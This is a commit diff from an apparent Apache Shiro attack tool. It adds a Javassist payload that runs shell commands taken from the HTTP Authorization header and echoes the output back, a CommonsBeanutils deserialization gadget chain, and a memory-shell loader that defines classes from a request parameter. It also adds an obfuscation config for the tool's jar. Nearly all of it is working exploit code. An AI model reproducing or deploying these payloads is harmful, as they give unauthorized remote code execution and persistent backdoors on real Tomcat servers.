dy to user

Author: SummerSec

pom.xml

@@ -236,7 +236,7 @@
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
             <artifactId>log4j-api</artifactId>
-            <version>2.13.3</version>
+            <version>2.14.1</version>
         </dependency>
         <dependency>
             <groupId>com.arronlong</groupId>
@@ -300,7 +300,11 @@
             <artifactId>hutool-all</artifactId>
             <version>5.7.13</version>
         </dependency>
-
+        <dependency>
+            <groupId>javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.12.0.GA</version>
+        </dependency>
 
     </dependencies>
 

src/main/java/com/summersec/attack/deser/echo/TomcatEcho.java

@@ -77,6 +77,7 @@ public CtClass genPayload(final ClassPool pool) throws CannotCompileException, N
                 "                            if (var3 != null && !var3.isEmpty()) {\n" +
                 "                                var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
                 "                                var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
+//                "                                var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Setcoolie\"), var3});\n" +
                 "                                var4 = true;\n" +
                 "                            }\n" +
                 "\n" +

src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java

@@ -0,0 +1,128 @@
+package com.summersec.attack.deser.echo;
+
+import javassist.*;
+
+import java.io.IOException;
+
+/**
+ * @ClassName: TomcatEcho2
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2022/1/19 11:33
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class TomcatEcho2 implements EchoPayload{
+    @Override
+    public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
+        final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
+        if (clazz.getDeclaredConstructors().length != 0) {
+            clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
+        }
+
+
+
+        clazz.addMethod(CtMethod.make("    private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
+                "        byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
+                "        Object var2;\n" +
+                "        Class var3;\n" +
+                "        try {\n" +
+                "            var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
+                "            var2 = var3.newInstance();\n" +
+                "            var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
+                "            var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+                "        } catch (Exception var5) {\n" +
+                "            var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
+                "            var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
+                "            var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
+                "        } \n" +
+                "    }",clazz));
+
+        clazz.addMethod(CtMethod.make("    private static Object getFV(Object var0, String var1) throws Exception {\n" +
+                "        java.lang.reflect.Field var2 = null;\n" +
+                "        Class var3 = var0.getClass();\n" +
+                "\n" +
+                "        while(var3 != Object.class) {\n" +
+                "            try {\n" +
+                "                var2 = var3.getDeclaredField(var1);\n" +
+                "                break;\n" +
+                "            } catch (NoSuchFieldException var5) {\n" +
+                "                var3 = var3.getSuperclass();\n" +
+                "            }\n" +
+                "        }\n" +
+                "\n" +
+                "        if (var2 == null) {\n" +
+                "            throw new NoSuchFieldException(var1);\n" +
+                "        } else {\n" +
+                "            var2.setAccessible(true);\n" +
+                "            return var2.get(var0);\n" +
+                "        }\n" +
+                "    }", clazz));
+        clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
+                "        boolean var4 = false;\n" +
+                "        Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
+                "        for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
+                "            Thread var7 = var5[var6];\n" +
+                "            if (var7 != null) {\n" +
+                "                String var3 = var7.getName();\n" +
+                "                if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
+                "                    Object var1 = getFV(var7, \"target\");\n" +
+                "                    if (var1 instanceof Runnable) {\n" +
+                "                        try {\n" +
+                "                            var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
+                "                        } catch (Exception var13) {\n" +
+                "                            continue;\n" +
+                "                        }\n" +
+                "                        java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
+                "\n" +
+                "                        for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
+                "                            Object var11 = var9.get(var10);\n" +
+                "                            var1 = getFV(var11, \"req\");\n" +
+                "                            Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
+                "                            try {\n" +
+                "\n" +
+                "\n" +
+                "                            var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
+                "                            if (var3 != null && !var3.isEmpty()) {\n" +
+                "                                var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
+                "                                var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
+                "                                var4 = true;\n" +
+                "                            }\n" +
+                "\n" +
+                "                            var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
+                "                            if (var3 != null && !var3.isEmpty()) {\n" +
+                "                                var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
+                "                                String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
+                "                                writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
+                "                                var4 = true;\n" +
+                "                            }\n" +
+                "\n" +
+                "                            if (var4) {\n" +
+                "                                break;\n" +
+                "                            }\n" +
+                "                            }catch (Exception var14) {\n" +
+                "                                writeBody(var2, var14.getMessage().getBytes());\n" +
+                "                            }\n" +
+                "                        }\n" +
+                "\n" +
+                "                        if (var4) {\n" +
+                "                            break;\n" +
+                "                        }\n" +
+                "                    }\n" +
+                "                }\n" +
+                "            }\n" +
+                "        }\n" +
+                "    }",clazz));
+
+        return clazz;
+    }
+
+
+    public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
+        ClassPool pool = ClassPool.getDefault();
+//        TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
+        SpringEcho springEcho = new SpringEcho();
+        springEcho.genPayload(pool);
+//        tomcatEcho2.genPayload(pool);
+    }
+}

src/main/java/com/summersec/attack/deser/payloads/CommonsBeanutilsString_192s.java

@@ -0,0 +1,57 @@
+package com.summersec.attack.deser.payloads;
+
+import com.summersec.attack.deser.payloads.annotation.Authors;
+import com.summersec.attack.deser.payloads.annotation.Dependencies;
+import com.summersec.attack.deser.util.JavassistClassLoader;
+import com.summersec.attack.deser.util.Reflections;
+import java.util.Comparator;
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+import com.summersec.attack.deser.util.StandardExecutorClassLoader;
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtField;
+
+
+@Dependencies({"commons-beanutils:commons-beanutils:1.6.1"})
+@Authors({"phith0n"})
+public class CommonsBeanutilsString_192s implements ObjectPayload<Queue<Object>> {
+    @Override
+    public Queue<Object> getObject(Object template) throws Exception {
+
+        ClassPool pool = ClassPool.getDefault();
+        pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator")));
+        final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator");
+
+        try {
+            CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID");
+            beanComparator.removeField(ctSUID);
+        }catch (javassist.NotFoundException e){}
+        beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator));
+        // mock method name until armed
+        final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance();
+        beanComparator.defrost();
+
+        PriorityQueue<String> queue = new PriorityQueue(2, (Comparator<?>)comparator);
+
+        queue.add("1");
+        queue.add("1");
+
+        Reflections.setFieldValue(queue, "queue", new Object[] { template, template });
+
+        Reflections.setFieldValue(beanComparator, "property", "outputProperties");
+
+        return (Queue)queue;
+    }
+
+    public static void main(String[] args) throws Exception {
+        CommonsBeanutilsString_192s commonsBeanutilsString192 = new CommonsBeanutilsString_192s();
+        commonsBeanutilsString192.getObject(new Object());
+
+    }
+}
+
+
+

src/main/java/com/summersec/attack/deser/plugins/InjectMemTool.java

@@ -17,7 +17,7 @@ public CtClass genPayload(ClassPool pool) throws Exception {
         }
         clazz.addMethod(CtMethod.make("    private static Object getFV(Object o, String s) throws Exception {\n        java.lang.reflect.Field f = null;\n        Class clazz = o.getClass();\n        while (clazz != Object.class) {\n            try {\n                f = clazz.getDeclaredField(s);\n                break;\n            } catch (NoSuchFieldException e) {\n                clazz = clazz.getSuperclass();\n            }\n        }\n        if (f == null) {\n            throw new NoSuchFieldException(s);\n        }\n        f.setAccessible(true);\n        return f.get(o);\n}", clazz));
 
-        clazz.addConstructor(CtNewConstructor.make("    public InjectMemTool() {\n        try {\n            Object o;\n            String s;\n            String dy = null;\n            Object resp;\n            boolean done = false;\n            Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n            for (int i = 0; i < ts.length; i++) {\n                Thread t = ts[i];\n                if (t == null) {\n                    continue;\n                }\n                s = t.getName();\n                if (!s.contains(\"exec\") && s.contains(\"http\")) {\n                    o = getFV(t, \"target\");\n                    if (!(o instanceof Runnable)) {\n                        continue;\n                    }\n\n                    try {\n                        o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n                    } catch (Exception e) {\n                        continue;\n                    }\n\n                    java.util.List ps = (java.util.List) getFV(o, \"processors\");\n                    for (int j = 0; j < ps.size(); j++) {\n                        Object p = ps.get(j);\n                        o = getFV(p, \"req\");\n                        resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n                        Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n                        dy = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"dy\")});\n\n                        if (dy != null && !dy.isEmpty()) {\n                            byte[] bytecodes = org.apache.shiro.codec.Base64.decode(dy);\n\n                            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n                            defineClassMethod.setAccessible(true);\n\n                            Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n                            cc.newInstance().equals(conreq);\n                            done = true;\n                        }\n                        if (done) {\n                            break;\n                        }\n                    }\n                }\n            }\n        } catch (Exception e) {\n            ;\n        }\n}", clazz));
+        clazz.addConstructor(CtNewConstructor.make("    public InjectMemTool() {\n        try {\n            Object o;\n            String s;\n            String user = null;\n            Object resp;\n            boolean done = false;\n            Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n            for (int i = 0; i < ts.length; i++) {\n                Thread t = ts[i];\n                if (t == null) {\n                    continue;\n                }\n                s = t.getName();\n                if (!s.contains(\"exec\") && s.contains(\"http\")) {\n                    o = getFV(t, \"target\");\n                    if (!(o instanceof Runnable)) {\n                        continue;\n                    }\n\n                    try {\n                        o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n                    } catch (Exception e) {\n                        continue;\n                    }\n\n                    java.util.List ps = (java.util.List) getFV(o, \"processors\");\n                    for (int j = 0; j < ps.size(); j++) {\n                        Object p = ps.get(j);\n                        o = getFV(p, \"req\");\n                        resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n\n                        Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});\n\n                        user = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"user\")});\n\n                        if (user != null && !user.isEmpty()) {\n                            byte[] bytecodes = org.apache.shiro.codec.Base64.decode(user);\n\n                            java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});\n                            defineClassMethod.setAccessible(true);\n\n                            Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});\n\n                            cc.newInstance().equals(conreq);\n                            done = true;\n                        }\n                        if (done) {\n                            break;\n                        }\n                    }\n                }\n            }\n        } catch (Exception e) {\n            ;\n        }\n}", clazz));
 
         return clazz;
     }

src/main/java/com/summersec/attack/deser/util/JavassistClassLoader.java

@@ -0,0 +1,15 @@
+package com.summersec.attack.deser.util;
+
+/**
+ * @ClassName: JavassistClassLoader
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2022/1/24 16:34
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class JavassistClassLoader extends ClassLoader {
+    public JavassistClassLoader(){
+        super(Thread.currentThread().getContextClassLoader());
+    }
+}

src/main/java/com/summersec/attack/deser/util/StandardExecutorClassLoader.java

@@ -39,10 +39,11 @@ private void loadResource(String version) {
         // 加载对应版本目录下的 Jar 包
         tryLoadJarInDir(jarPath);
         // 加载对应版本目录下的 lib 目录下的 Jar 包
-        tryLoadJarInDir(jarPath + File.separator + "lib");
+//        tryLoadJarInDir(jarPath + File.separator + "lib");
     }
 
     private void tryLoadJarInDir(String dirPath) {
+        System.out.println("Try load jar in dir: " + dirPath);
         File dir = new File(dirPath);
         // 自动加载目录下的jar包
         if (dir.exists() && dir.isDirectory()) {

src/main/resources/allatori.xml

@@ -0,0 +1,34 @@
+<!--allatori配置文件-->
+<config>
+<!--    <!\-\- 输入和输出jar配置，out指向的是加密后的jar &ndash;&gt;-->
+    <input>
+<!--        <jar in="shiro_attack-4.3-SNAPSHOT.jar" out="obf-shiro_attack-4.3-SNAPSHOT.jar"/>-->
+        <jar in="shiro_attack-4.4-SNAPSHOT-all.jar" out="obf-shiro_attack-4.4-SNAPSHOT-all.jar"/>
+    </input>
+<!--    <!\-\- 加水印 &ndash;&gt;-->
+    <watermark key="shiro_attack" value="developer: SummerSec"/>
+<!--    <!\-\- 需要保留原来类名的配置 &ndash;&gt;-->
+    <keep-names>
+        <class access="protected+">
+            <field access="protected+"/>
+            <method access="protected+"/>
+        </class>
+        <class template="class com.xxx.xxx.*"/>
+
+    </keep-names>
+
+    <property name="log-file" value="log.xml"/>
+    <ignore-classes>
+        <class template="class \*springframework\*"/>
+        <class template="class \*shardingjdbc\*"/>
+        <class template="class \*jni\*"/>
+        <class template="class \*alibaba\*"/>
+        <class template="class \*persistence\*"/>
+        <class template="class \*apache\*"/>
+        <class template="class \*mybatis\*"/>
+<!--        <!\-\- 排除包下的类，可单个到具体,注意此处一定要排除掉springboot项目的启动类 &ndash;&gt;-->
+        <class template="class com.apache.*"/>
+        <class template="class org.apache.http.entity.StringEntity"/>
+        <class template="class org.apache.cxf.*"/>
+    </ignore-classes>
+</config>